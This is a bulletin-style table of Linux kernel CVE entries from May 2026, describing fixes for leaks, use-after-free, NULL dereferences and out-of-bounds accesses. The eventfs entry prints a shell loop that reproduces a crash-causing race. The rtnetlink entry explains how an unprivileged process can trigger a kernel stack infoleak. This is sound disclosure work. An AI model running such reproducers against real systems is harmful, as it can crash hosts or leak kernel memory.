| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: fix resource leaks on device setup failure Make sure to call controller cleanup() if spi_setup() fails while registering a device to avoid leaking any resources allocated by setup(). | 2026-05-27 | not yet calculated | CVE-2026-46083 | https://git.kernel.org/stable/c/a2c817c629430fbbd54273525b472dac96e2c8fd https://git.kernel.org/stable/c/1e774294b2f944f59e03a04eb438768a4b93c3ce https://git.kernel.org/stable/c/11baa8b24bcb07ae2048f2566a220021d766abe0 https://git.kernel.org/stable/c/dbcead54b12468d9aa54c0e1f0042d838ec3b0ae https://git.kernel.org/stable/c/db357034f7e0cf23f233f414a8508312dfe8fbbe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mana_ib: Disable RX steering on RSS QP destroy When an RSS QP is destroyed (e.g. DPDK exit), mana_ib_destroy_qp_rss() destroys the RX WQ objects but does not disable vPort RX steering in firmware. This leaves stale steering configuration that still points to the destroyed RX objects. If traffic continues to arrive (e.g. peer VM is still transmitting) and the VF interface is subsequently brought up (mana_open), the firmware may deliver completions using stale CQ IDs from the old RX objects. These CQ IDs can be reused by the ethernet driver for new TX CQs, causing RX completions to land on TX CQs: WARNING: mana_poll_tx_cq+0x1b8/0x220 [mana] (is_sq == false) WARNING: mana_gd_process_eq_events+0x209/0x290 (cq_table lookup fails) Fix this by disabling vPort RX steering before destroying RX WQ objects. Note that mana_fence_rqs() cannot be used here because the fence completion is delivered on the CQ, which is polled by user-mode (e.g. DPDK) and not visible to the kernel driver. Refactor the disable logic into a shared mana_disable_vport_rx() in mana_en, exported for use by mana_ib, replacing the duplicate code. The ethernet driver's mana_dealloc_queues() is also updated to call this common function. | 2026-05-27 | not yet calculated | CVE-2026-46084 | https://git.kernel.org/stable/c/6a2d6273b6c3581ce7b90ce17b5cbb4efd19438f https://git.kernel.org/stable/c/f1ccc4d500a0b87a5599343fc2f798048836e184 https://git.kernel.org/stable/c/8ba804869382ce307f2a15f5f6f2adfd791f41dc https://git.kernel.org/stable/c/3be5ed233de03b00ae868cfc06e95331d8d9007c https://git.kernel.org/stable/c/dbeb256e8dd87233d891b170c0b32a6466467036 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: bridge: use a stable FDB dst snapshot in RCU readers Local FDB entries can be rewritten in place by `fdb_delete_local()`, which updates `f->dst` to another port or to `NULL` while keeping the entry alive. Several bridge RCU readers inspect `f->dst`, including `br_fdb_fillbuf()` through the `brforward_read()` sysfs path. These readers currently load `f->dst` multiple times and can therefore observe inconsistent values across the check and later dereference. In `br_fdb_fillbuf()`, this means a concurrent local-FDB update can change `f->dst` after the NULL check and before the `port_no` dereference, leading to a NULL-ptr-deref. Fix this by taking a single `READ_ONCE()` snapshot of `f->dst` in each affected RCU reader and using that snapshot for the rest of the access sequence. Also publish the in-place `f->dst` updates in `fdb_delete_local()` with `WRITE_ONCE()` so the readers and writer use matching access patterns. | 2026-05-27 | not yet calculated | CVE-2026-46086 | https://git.kernel.org/stable/c/0b9e4bbfb7c949151e3acd44ed4aa33614d2e110 https://git.kernel.org/stable/c/81af4137a30c4c2dc694dea8cacb180bd66000ef https://git.kernel.org/stable/c/5424e678f9b304e148cf5dcc047cffc7a56a3bb5 https://git.kernel.org/stable/c/9a2d9d4e657b23dc21f24cf139e3aeff0b61341f https://git.kernel.org/stable/c/df4601653201de21b487c3e7fffd464790cab808 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/stat: fix memory leak on damon_start() failure in damon_stat_start() Destroy the DAMON context and reset the global pointer when damon_start() fails. Otherwise, the context allocated by damon_stat_build_ctx() is leaked, and the stale damon_stat_context pointer will be overwritten on the next enable attempt, making the old allocation permanently unreachable. | 2026-05-27 | not yet calculated | CVE-2026-46087 | https://git.kernel.org/stable/c/8a62c58411cbd748d7aeab0e5b0963e33ff47a7a https://git.kernel.org/stable/c/50bc1d7e0f3bb6932c8dc5da0907eead0790176b https://git.kernel.org/stable/c/e04ed278d25bf15769800bf6e35c6737f137186f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: control: Validate buf_len before strnlen() in snd_ctl_elem_init_enum_names() snd_ctl_elem_init_enum_names() advances pointer p through the names buffer while decrementing buf_len. If buf_len reaches zero but items remain, the next iteration calls strnlen(p, 0). While strnlen(p, 0) returns 0 and would hit the existing name_len == 0 error path, CONFIG_FORTIFY_SOURCE's fortified strnlen() first checks maxlen against __builtin_dynamic_object_size(). When Clang loses track of p's object size inside the loop, this triggers a BRK exception panic before the return value is examined. Add a buf_len == 0 guard at the loop entry to prevent calling fortified strnlen() on an exhausted buffer. Found by kernel fuzz testing through Xiaomi Smartphone. | 2026-05-27 | not yet calculated | CVE-2026-46088 | https://git.kernel.org/stable/c/1fbe46d2b72754d8bd580e13e59ccb5d3d0e8cb0 https://git.kernel.org/stable/c/8ba0214c3dd32b8ec652947e3f2bc5b8f6e6be9e https://git.kernel.org/stable/c/654c818a69c21d2bea4e8fd9eae7da865df9a5c8 https://git.kernel.org/stable/c/82012fd3e78a14360fbc2f1a7491589896704f97 https://git.kernel.org/stable/c/e0da8a8cac74f4b9f577979d131f0d2b88a84487 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: zram: do not forget to endio for partial discard requests As reported by Qu Wenruo and Avinesh Kumar, the following getconf PAGESIZE 65536 blkdiscard -p 4k /dev/zram0 takes literally forever to complete. zram doesn't support partial discards and just returns immediately w/o doing any discard work in such cases. The problem is that we forget to endio on our way out, so blkdiscard sleeps forever in submit_bio_wait(). Fix this by jumping to end_bio label, which does bio_endio(). | 2026-05-27 | not yet calculated | CVE-2026-46089 | https://git.kernel.org/stable/c/2d1f18efccdb8b29552399d024c36b705447e975 https://git.kernel.org/stable/c/35d3300f6357cfaa72db2721dc2b345b19bac5df https://git.kernel.org/stable/c/a02363f71a79b755daa78a70d6b217f9c13c8c85 https://git.kernel.org/stable/c/68ce397e8236088fc53b9532d383a722288c8194 https://git.kernel.org/stable/c/e3668b371329ea036ff022ce8ecc82f8befcf003 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: rc: igorplugusb: heed coherency rules In a control request, the USB request structure can be subject to DMA on some HCs. Hence it must obey the rules for DMA coherency. Allocate it separately. | 2026-05-27 | not yet calculated | CVE-2026-46091 | https://git.kernel.org/stable/c/18d6a7c9e4e63c57157e9a57dd9bf3cd38e4c45a https://git.kernel.org/stable/c/0be8fcd9005e3d3b5a61fe34b070a9663adbb4dc https://git.kernel.org/stable/c/0adac0ee2c42027d80bac02ea9b576a88f8955d3 https://git.kernel.org/stable/c/a62ca67e3c72fb297dc7c86495ba8f7329d7f150 https://git.kernel.org/stable/c/eac69475b01fe1e861dfe3960b57fa95671c132e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw88: check for PCI upstream bridge existence pci_upstream_bridge() returns NULL if the device is on a root bus. If 8821CE is installed in the system with such a PCI topology, the probing routine will crash. This has probably been unnoticed as 8821CE is mostly supplied in laptops where there is a PCI-to-PCI bridge located upstream from the device. However the card might be installed on a system with different configuration. Check if the bridge does exist for the specific workaround to be applied. Found by Linux Verification Center (linuxtesting.org) with Svace static analysis tool. | 2026-05-27 | not yet calculated | CVE-2026-46092 | https://git.kernel.org/stable/c/eb101d2abdcccb514ca4fccd3b278dd8267374f6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix bounds check in check_xattrs() to prevent out-of-bounds access The bounds check for the next xattr entry in check_xattrs() uses (void *)next >= end, which allows next to point within sizeof(u32) bytes of end. On the next loop iteration, IS_LAST_ENTRY() reads 4 bytes via *(__u32 *)(entry), which can overrun the valid xattr region. For example, if next lands at end - 1, the check passes since next < end, but IS_LAST_ENTRY() reads 4 bytes starting at end - 1, accessing 3 bytes beyond the valid region. Fix this by changing the check to (void *)next + sizeof(u32) > end, ensuring there is always enough space for the IS_LAST_ENTRY() read on the subsequent iteration. | 2026-05-27 | not yet calculated | CVE-2026-46094 | https://git.kernel.org/stable/c/ab6da97bc310db35d4e4ef5354bc3ff626b0698c https://git.kernel.org/stable/c/5a5314d2387633a272a04d1bd8727f99058e4e68 https://git.kernel.org/stable/c/537e065977022aa22f2c2503e8accaf16622e0fd https://git.kernel.org/stable/c/520986722dbf869c122252123fc161c7302eab7d https://git.kernel.org/stable/c/eceafc31ea7b42c984ece10d79d505c0bb6615d5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/md-llbitmap: raise barrier before state machine transition Move the barrier raise operation before calling llbitmap_state_machine() in both llbitmap_start_write() and llbitmap_start_discard(). This ensures the barrier is in place before any state transitions occur, preventing potential race conditions where the state machine could complete before the barrier is properly raised. | 2026-05-27 | not yet calculated | CVE-2026-46095 | https://git.kernel.org/stable/c/9142f00a9287ca38152717e3e88a033a27774e7f https://git.kernel.org/stable/c/9701d51dd378380ba05293fa391e8ba01065ae8d https://git.kernel.org/stable/c/ef4ca3d4bf09716cff9ba00eb0351deadc8417ab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm2-sessions: Fix missing tpm_buf_destroy() in tpm2_read_public() tpm2_read_public() calls tpm_buf_init() but fails to call tpm_buf_destroy() on two exit paths, leaking a page allocation: 1. When name_size() returns an error (unrecognized hash algorithm), the function returns directly without destroying the buffer. 2. On the success path, the buffer is never destroyed before returning. All other error paths in the function correctly call tpm_buf_destroy() before returning. Fix both by adding the missing tpm_buf_destroy() calls. | 2026-05-27 | not yet calculated | CVE-2026-46096 | https://git.kernel.org/stable/c/f8775d9d9062da662cc861f9ff7722a65896d4cd https://git.kernel.org/stable/c/2f434be87e256fd58254f60ddf5d7d58e775ca0b https://git.kernel.org/stable/c/f0f75a3d98b7959a8677b6363e23190f3018636b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Input: edt-ft5x06 - fix use-after-free in debugfs teardown The commit 68743c500c6e ("Input: edt-ft5x06 - use per-client debugfs directory") removed the manual debugfs teardown, relying on the I2C core to handle it. However, this creates a window where debugfs files are still accessible after edt_ft5x06_ts_teardown_debugfs() frees tsdata->raw_buffer. To prevent a use-after-free, protect the freeing of raw_buffer with the device mutex and set raw_buffer to NULL. The debugfs read function already checks if raw_buffer is NULL under the same mutex, so this safely avoids the use-after-free. | 2026-05-27 | not yet calculated | CVE-2026-46097 | https://git.kernel.org/stable/c/a516d43886623e3cca5fa3446bed8fc7c7982be2 https://git.kernel.org/stable/c/9f6c5e7b747d40e1c65cbfcb975857d25154c075 https://git.kernel.org/stable/c/f5f9e07060519e2287e99019a6de1eb3ebb65c37 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: caif: clear client service pointer on teardown `caif_connect()` can tear down an existing client after remote shutdown by calling `caif_disconnect_client()` followed by `caif_free_client()`. `caif_free_client()` releases the service layer referenced by `adap_layer->dn`, but leaves that pointer stale. When the socket is later destroyed, `caif_sock_destructor()` calls `caif_free_client()` again and dereferences the freed service pointer. Clear the client/service links before releasing the service object so repeated teardown becomes harmless. | 2026-05-27 | not yet calculated | CVE-2026-46098 | https://git.kernel.org/stable/c/914c6456fcfc21a3d553945dff62fd1621d6155d https://git.kernel.org/stable/c/3ac6db584d9d420267bb8413115707eeec76d9cf https://git.kernel.org/stable/c/63d21a3aa0108b9dde4e99b0d3d5d679ac68c0f9 https://git.kernel.org/stable/c/a4b191ddc12c55ddb62feb096536f819f384d6f1 https://git.kernel.org/stable/c/f7cf8ece8cee3c1ee361991470cdb1eb65ab02e8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: reject zero shift in nft_bitwise Reject zero shift operands for nft_bitwise left and right shift expressions during initialization. The carry propagation logic computes the carry from the adjacent 32-bit word using BITS_PER_TYPE(u32) - shift. A zero shift operand turns this into a 32-bit shift, which is undefined behaviour. Reject zero shift operands in the control plane, alongside the existing check for values greater than or equal to 32, so malformed rules never reach the packet path. | 2026-05-27 | not yet calculated | CVE-2026-46101 | https://git.kernel.org/stable/c/bffef0acec9c3b837a785248a893137fb7f26c95 https://git.kernel.org/stable/c/ca24f1243ad1a4d12d6a23876bbbe3ed02099853 https://git.kernel.org/stable/c/6f820139d16a4c9865a145d4a9cf9c92cc632c14 https://git.kernel.org/stable/c/f370205974f171a5868c13ff30d7642fed46e47b https://git.kernel.org/stable/c/fe11e5c40817b84abaa5d83bfb6586d8412bfd07 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: ucan: fix devres lifetime USB drivers bind to USB interfaces and any device managed resources should have their lifetime tied to the interface rather than parent USB device. This avoids issues like memory leaks when drivers are unbound without their devices being physically disconnected (e.g. on probe deferral or configuration changes). Fix the control message buffer lifetime so that it is released on driver unbind. | 2026-05-27 | not yet calculated | CVE-2026-46103 | https://git.kernel.org/stable/c/4b7d07747400cfd7eff1ba7b8b5a7c8d5a58f705 https://git.kernel.org/stable/c/10b7b676b78a7bd888d19729b459aad7fc1f428b https://git.kernel.org/stable/c/c524c124e3094d2de12235a513854c03d06a2b58 https://git.kernel.org/stable/c/c0d3ccc6929e4509076df8f30a4fb1dc5018b0ae https://git.kernel.org/stable/c/fed4626501c871890da287bec62a96e52da1af89 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: selinux: use sk blob accessor in socket permission helpers SELinux socket state lives in the composite LSM socket blob. sock_has_perm() and nlmsg_sock_has_extended_perms() currently dereference sk->sk_security directly, which assumes the SELinux socket blob is at offset zero. In stacked configurations that assumption does not hold. If another LSM allocates socket blob storage before SELinux, these helpers may read the wrong blob and feed invalid SID and class values into AVC checks. Use selinux_sock() instead of accessing sk->sk_security directly. | 2026-05-28 | not yet calculated | CVE-2026-46104 | https://git.kernel.org/stable/c/d350fef4bc2467fe1bce15f7a20fe60e01ce41ad https://git.kernel.org/stable/c/7eca71f57f194c1638ebb7f4097d6be8fd04c101 https://git.kernel.org/stable/c/032e70aff025d7c519af9ab791cd084380619263 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: eventfs: Hold eventfs_mutex and SRCU when remount walks events Commit 340f0c7067a9 ("eventfs: Update all the eventfs_inodes from the events descriptor") had eventfs_set_attrs() recurse through ei->children on remount. The walk only holds the rcu_read_lock() taken by tracefs_apply_options() over tracefs_inodes, which is wrong: - list_for_each_entry over ei->children races with the list_del_rcu() in eventfs_remove_rec() -- LIST_POISON1 deref, same shape as d2603279c7d6. - eventfs_inodes are freed via call_srcu(&eventfs_srcu, ...). rcu_read_lock() does not extend an SRCU grace period, so ti->private can be reclaimed under the walk. - The writes to ei->attr race with eventfs_set_attr(), which holds eventfs_mutex. Reproducer: while :; do mount -o remount,uid=$((RANDOM%1000)) /sys/kernel/tracing; done & while :; do echo "p:kp submit_bio" > /sys/kernel/tracing/kprobe_events echo > /sys/kernel/tracing/kprobe_events done Wrap the events portion of tracefs_apply_options() in eventfs_remount_lock()/_unlock() that take eventfs_mutex and srcu_read_lock(&eventfs_srcu). eventfs_set_attrs() doesn't sleep so the nested rcu_read_lock() is fine; lockdep_assert_held() pins the contract. Comment in tracefs_drop_inode() said "RCU cycle" -- it is SRCU. | 2026-05-28 | not yet calculated | CVE-2026-46106 | https://git.kernel.org/stable/c/ae9cd0b46b1890040006a2fc5e905c5d6053fd02 https://git.kernel.org/stable/c/44e64d8a432837308f4dda3ffe819f1ec092a0ba https://git.kernel.org/stable/c/52b109f1b875b912d4ab2c5fdd8c322d47119d9b https://git.kernel.org/stable/c/ed2ad73bcb0a7a6cc934097d4853b6d5124c317e https://git.kernel.org/stable/c/07004a8c4b572171934390148ee48c4175c77eed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipmi:si: Return state to normal if message allocation fails There were places where nothing would get started if a message allocation failed, so the driver needs to return to normal state. | 2026-05-28 | not yet calculated | CVE-2026-46108 | https://git.kernel.org/stable/c/ce905b65e649eee378a0f37e8219f1d70efb3007 https://git.kernel.org/stable/c/88881dc1da86064f479378bc9d0a4956c3d0bb12 https://git.kernel.org/stable/c/bc13fce9eeec88c4950924754c3347c6dc66ff4c https://git.kernel.org/stable/c/ba60140d4133231b49185ac8bf6e54f318d3134e https://git.kernel.org/stable/c/09dd798270ff582d7309f285d4aaf5dbebae01cb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: ulpi: fix memory leak on ulpi_register() error paths Commit 01af542392b5 ("usb: ulpi: fix double free in ulpi_register_interface() error path") removed kfree(ulpi) from ulpi_register_interface() to fix a double-free when device_register() fails. But when ulpi_of_register() or ulpi_read_id() fail before device_register() is called, the ulpi allocation is leaked. Add kfree(ulpi) on both error paths to properly clean up the allocation. | 2026-05-28 | not yet calculated | CVE-2026-46109 | https://git.kernel.org/stable/c/b0c0d44adb55c66663886cb6e30ee92cbb0f5385 https://git.kernel.org/stable/c/be2c1d825f54277472c87019e82013ac534ddc4c https://git.kernel.org/stable/c/2a71e01b2cf9b4329ff67102c1bea7448c2a2d2d https://git.kernel.org/stable/c/f30ccfc2985590b33a23a3d8bed7ca16c0af551b https://git.kernel.org/stable/c/0b9fcab1b8608d429e5f239afb197de928d4de7d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pseries/papr-hvpipe: Fix null ptr deref in papr_hvpipe_dev_create_handle() commit 6d3789d347a7 ("papr-hvpipe: convert papr_hvpipe_dev_create_handle() to FD_PREPARE()"), changed the create handle to FD_PREPARE(), but it caused kernel null-ptr-deref because after call to retain_and_null_ptr(src_info), src_info is re-used for adding it to the global list. Getting the following kernel panic in papr_hvpipe_dev_create_handle() when trying to add src_info to the list. Kernel attempted to write user page (0) - exploit attempt? (uid: 0) BUG: Kernel NULL pointer dereference on write at 0x00000000 Faulting instruction address: 0xc0000000001b44a0 Oops: Kernel access of bad area, sig: 11 [#1] ... Call Trace: papr_hvpipe_dev_ioctl+0x1f4/0x48c (unreliable) sys_ioctl+0x528/0x1064 system_call_exception+0x128/0x360 system_call_vectored_common+0x15c/0x2ec Now, the error handling with FD_PREPARE's file cleanup and __free(kfree) auto cleanup is getting too convoluted. This is mainly because we need to ensure only 1 user get the srcID handle. To simplify this, we allocate prepare the src_info in the beginning and add it to the global list under a spinlock after checking that no duplicates exist. This simplify the error handling where if the FD_ADD fails, we can simply remove the src_info from the list and consume any pending msg in hvpipe to be cleared, after src_info became visible in the global list. | 2026-05-28 | not yet calculated | CVE-2026-46118 | https://git.kernel.org/stable/c/735439394dde8462f9b50566727fbe333beaadaf https://git.kernel.org/stable/c/cf51bec1560f8bf115d1476f60335f9d90e110b0 https://git.kernel.org/stable/c/1b9f7aafa44f5ce852c00509104d10fd9eb0f402 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/sysfs-schemes: protect memcg_path kfree() with damon_sysfs_lock Patch series "mm/damon/sysfs-schemes: fix use-after-free for [memcg_]path". Reads of 'memcg_path' and 'path' files in DAMON sysfs interface could race with their writes, results in use-after-free. Fix those. This patch (of 2): damon_sysfs_scheme_filter->mmecg_path can be read and written by users, via DAMON sysfs memcg_path file. It can also be indirectly read, for the parameters {on,off}line committing to DAMON. The reads for parameters committing are protected by damon_sysfs_lock to avoid the sysfs files being destroyed while any of the parameters are being read. But the user-driven direct reads and writes are not protected by any lock, while the write is deallocating the memcg_path-pointing buffer. As a result, the readers could read the already freed buffer (user-after-free). Note that the user-reads don't race when the same open file is used by the writer, due to kernfs's open file locking. Nonetheless, doing the reads and writes with separate open files would be common. Fix it by protecting both the user-direct reads and writes with damon_sysfs_lock. | 2026-05-28 | not yet calculated | CVE-2026-46121 | https://git.kernel.org/stable/c/b1e9f2d5870776347edef927f9bb3ea19b8e3abb https://git.kernel.org/stable/c/c88802d0e8edd14b6cd2daf3000f99adbc4c85c5 https://git.kernel.org/stable/c/eafd6f5372d29b0dd213799b92c2c9c7ad31d7da https://git.kernel.org/stable/c/baecc45ad60e621ef14d6c1e7f41ef36bbfdf910 https://git.kernel.org/stable/c/1e68eb96e8beb1abefd12dd22c5637795d8a877e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: b43: enforce bounds check on firmware key index in b43_rx() The firmware-controlled key index in b43_rx() can exceed the dev->key[] array size (58 entries). The existing B43_WARN_ON is non-enforcing in production builds, allowing an out-of-bounds read. Make the B43_WARN_ON check enforcing by dropping the frame when the firmware returns an invalid key index. | 2026-05-28 | not yet calculated | CVE-2026-46122 | https://git.kernel.org/stable/c/c3d7b90dc95020cd9282c4630e402fe224f7644e https://git.kernel.org/stable/c/1e9e55cf66f0fa4799f4d86ef3aaba8e606b5c14 https://git.kernel.org/stable/c/d7029879bafdac2006c67553807d122283dc6cbf https://git.kernel.org/stable/c/219ba67e69e49681e48c822d6eaafb5def032f34 https://git.kernel.org/stable/c/1f4f78bf8549e6ac4f04fba4176854f3a6e0c332 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mana: Fix mana_destroy_wq_obj() cleanup in mana_ib_create_qp_rss() Sashiko points out there are two bugs here in the error unwind flow, both related to how the WQ table is unwound. First there is a double i-- on the first failure path due to the while loop having a i--, remove it. Second if mana_ib_install_cq_cb() fails then mana_create_wq_obj() is not undone due to the above i--. | 2026-05-28 | not yet calculated | CVE-2026-46126 | https://git.kernel.org/stable/c/8f23eb6c50f1a4bf32fc4d62cfb9fc39e8e586cf https://git.kernel.org/stable/c/bb9cb36eaefa4dcb7c0d9f7a01e5c739abdd53a8 https://git.kernel.org/stable/c/9a05a6798177e44dfbe18393be2c1ebb89ab06fd https://git.kernel.org/stable/c/34ecf795692ee57c393109f4a24ccc313091e137 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/ocrdma: Don't NULL deref uctx on errors in ocrdma_copy_pd_uresp() Sashiko points out that pd->uctx isn't initialized until late in the function so all these error flow references are NULL and will crash. Use the uctx that isn't NULL. | 2026-05-28 | not yet calculated | CVE-2026-46127 | https://git.kernel.org/stable/c/e01a957561f663d3b68d2fd233a4502e3367efcd https://git.kernel.org/stable/c/75fc130664ae324e7b2f9ad3630e0f175e9ca6c8 https://git.kernel.org/stable/c/8832626a483439e207734e027afff322ccdf726e https://git.kernel.org/stable/c/ec44c00a4fe1327efa35083f98b39c01cb535a51 https://git.kernel.org/stable/c/34fbf48cf3b410d2a6e8c586fa952a36331ca5ba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipmi: Check event message buffer response for bad data The event message buffer response data size got checked later when processing, but check it right after the response comes back. It appears some BMCs may return an empty message instead of an error when fetching events. There are apparently some new BMCs that make this error, so we need to compensate. | 2026-05-28 | not yet calculated | CVE-2026-46128 | https://git.kernel.org/stable/c/2418e4b21fb1355504d095da5d5f0a210564a43d https://git.kernel.org/stable/c/7f7ada72c07a83b46045ddfeee526bd9e2e3c8f0 https://git.kernel.org/stable/c/42432b579a594b66ac32e5e7b7c26e6bc578ec89 https://git.kernel.org/stable/c/24269264c3d59a49eb09b10af2c75b14f2931482 https://git.kernel.org/stable/c/36920f30e78e69df01f9691c470b6f3ba8aebf98 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm-verity-fec: fix reading parity bytes split across blocks (take 3) fec_decode_bufs() assumes that the parity bytes of the first RS codeword it decodes are never split across parity blocks. This assumption is false. Consider v->fec->block_size == 4096 && v->fec->roots == 17 && fio->nbufs == 1, for example. In that case, each call to fec_decode_bufs() consumes v->fec->roots * (fio->nbufs << DM_VERITY_FEC_BUF_RS_BITS) = 272 parity bytes. Considering that the parity data for each message block starts on a block boundary, the byte alignment in the parity data will iterate through 272*i mod 4096 until the 3 parity blocks have been consumed. On the 16th call (i=15), the alignment will be 4080 bytes into the first block. Only 16 bytes remain in that block, but 17 parity bytes will be needed. The code reads out-of-bounds from the parity block buffer. Fortunately this doesn't normally happen, since it can occur only for certain non-default values of fec_roots *and* when the maximum number of buffers couldn't be allocated due to low memory. For example with block_size=4096 only the following cases are affected: fec_roots=17: nbufs in [1, 3, 5, 15] fec_roots=19: nbufs in [1, 229] fec_roots=21: nbufs in [1, 3, 5, 13, 15, 39, 65, 195] fec_roots=23: nbufs in [1, 89] Regardless, fix it by refactoring how the parity blocks are read. | 2026-05-28 | not yet calculated | CVE-2026-46130 | https://git.kernel.org/stable/c/3d1b4e2d8ac0a1a1390a117f61ce0ca1c47e3bcb https://git.kernel.org/stable/c/430a05cb926f6bdf53e81460a2c3a553257f3f61 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: x86: check for nEPT/nNPT in slow flush hypercalls Checking is_guest_mode(vcpu) is incorrect, because translate_nested_gpa() is only valid if an L2 guest is running *with nested EPT/NPT enabled*. Instead use the same condition as translate_nested_gpa() itself. | 2026-05-28 | not yet calculated | CVE-2026-46131 | https://git.kernel.org/stable/c/971f17f5d91045404e3914029ea57c3da90179a4 https://git.kernel.org/stable/c/45fc766bc756ff1d66f8ca026a9c4f7f764adfae https://git.kernel.org/stable/c/d6f4e217d663ede5becc2fd6cb612c749677387b https://git.kernel.org/stable/c/4c7f8436b19a2a3acc0cb6b6e3becd6796ae5c57 https://git.kernel.org/stable/c/464af6fc2b1dcc74005b7f58ee3812b17777efee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: rtnetlink: zero ifla_vf_broadcast to avoid stack infoleak in rtnl_fill_vfinfo rtnl_fill_vfinfo() declares struct ifla_vf_broadcast on the stack without initialisation: struct ifla_vf_broadcast vf_broadcast; The struct contains a single fixed 32-byte field: /* include/uapi/linux/if_link.h */ struct ifla_vf_broadcast { __u8 broadcast[32]; }; The function then copies dev->broadcast into it using dev->addr_len as the length: memcpy(vf_broadcast.broadcast, dev->broadcast, dev->addr_len); On Ethernet devices (the overwhelming majority of SR-IOV NICs) dev->addr_len is 6, so only the first 6 bytes of broadcast[] are written. The remaining 26 bytes retain whatever was previously on the kernel stack. The full struct is then handed to userspace via: nla_put(skb, IFLA_VF_BROADCAST, sizeof(vf_broadcast), &vf_broadcast) leaking up to 26 bytes of uninitialised kernel stack per VF per RTM_GETLINK request, repeatable. The other vf_* structs in the same function are explicitly zeroed for exactly this reason - see the memset() calls for ivi, vf_vlan_info, node_guid and port_guid a few lines above. vf_broadcast was simply missed when it was added. Reachability: any unprivileged local process can open AF_NETLINK / NETLINK_ROUTE without capabilities and send RTM_GETLINK with an IFLA_EXT_MASK attribute carrying RTEXT_FILTER_VF. The kernel walks each VF and emits IFLA_VF_BROADCAST, leaking 26 bytes of stack per VF per request. Stack residue at this call site can include return addresses and transient sensitive data; KASAN with stack instrumentation, or KMSAN, will flag the nla_put() when reproduced. Zero the on-stack struct before the partial memcpy, matching the existing pattern used for the other vf_* structs in the same function. | 2026-05-28 | not yet calculated | CVE-2026-46132 | https://git.kernel.org/stable/c/0653c0516234c8258975d268a749115fc0f0ff00 https://git.kernel.org/stable/c/c5b1b92ab7eff1a6e8c507ddde6fd02fabd0cfa8 https://git.kernel.org/stable/c/fbe0e6197225e6a83cf113a67a4b425f8de0bcd5 https://git.kernel.org/stable/c/38bcc21f52246badb3154b6158dcb381d98de011 https://git.kernel.org/stable/c/4b9e327991815e128ad3af75c3a04630a63ce3e0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/chrome: cros_ec_typec: Init mutex in Thunderbolt registration cros_typec_register_thunderbolt() missed initializing the `adata->lock` mutex. This leads to a NULL dereference when the mutex is later acquired (e.g. in cros_typec_altmode_work()). Initialize the mutex in cros_typec_register_thunderbolt() to fix the issue. | 2026-05-28 | not yet calculated | CVE-2026-46134 | https://git.kernel.org/stable/c/23ae72e8c2f1c1d1da8cbd479320ddcfcc9c7435 https://git.kernel.org/stable/c/3b13d5883a097f538fccbab1c61c95546d29621f https://git.kernel.org/stable/c/525cb7ba6661074c1c5cc3772bccc6afab6791ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: mt7921: fix a potential clc buffer length underflow The buf_len is used to limit the iterations for retrieving the country power setting and may underflow under certain conditions due to changes in the power table in CLC. This underflow leads to an almost infinite loop or an invalid power setting resulting in driver initialization failure. | 2026-05-28 | not yet calculated | CVE-2026-46136 | https://git.kernel.org/stable/c/e451c325b000b9a0081fd93bc6d103d6943d4b55 https://git.kernel.org/stable/c/90cc573fd2f46ddbc2c329e7814b5ba3deb7b939 https://git.kernel.org/stable/c/0aa63d33742b805d1a218d18d12b983cce4b2f7b https://git.kernel.org/stable/c/a0111847f0b4f6023f6dd320114697514e024ba3 https://git.kernel.org/stable/c/5373f8b19e568b5c217832b9bbef165bd2b2df14 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: use kzalloc to zero-initialize security descriptor buffer Commit 62e7dd0a39c2d ("smb: common: change the data type of num_aces to le16") split struct smb_acl's __le32 num_aces field into __le16 num_aces and __le16 reserved. The reserved field corresponds to Sbz2 in the MS-DTYP ACL wire format, which must be zero [1]. When building an ACL descriptor in build_sec_desc(), we are using a kmalloc()'ed descriptor buffer and writing the fields explicitly using le16() writes now. This never writes to the 2 byte reserved field, leaving it as uninitialized heap data. When the reserved field happens to contain non-zero slab garbage, Samba rejects the security descriptor with "ndr_pull_security_descriptor failed: Range Error", causing chmod to fail with EINVAL. Change kmalloc() to kzalloc() to ensure the entire buffer is zero-initialized. [1] https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/20233ed8-a6c6-4097-aafa-dd545ed24428 | 2026-05-28 | not yet calculated | CVE-2026-46139 | https://git.kernel.org/stable/c/4c3ed344a970aad51388ac3b0145b98318f0e21f https://git.kernel.org/stable/c/941a1e6eb35440336913afc88a82103291956d5d https://git.kernel.org/stable/c/be1ef9512a3f5a755895c24f31b334342f4aa15b https://git.kernel.org/stable/c/9bdb2ca31368b7671949dfb94a5d57ffccd01edd 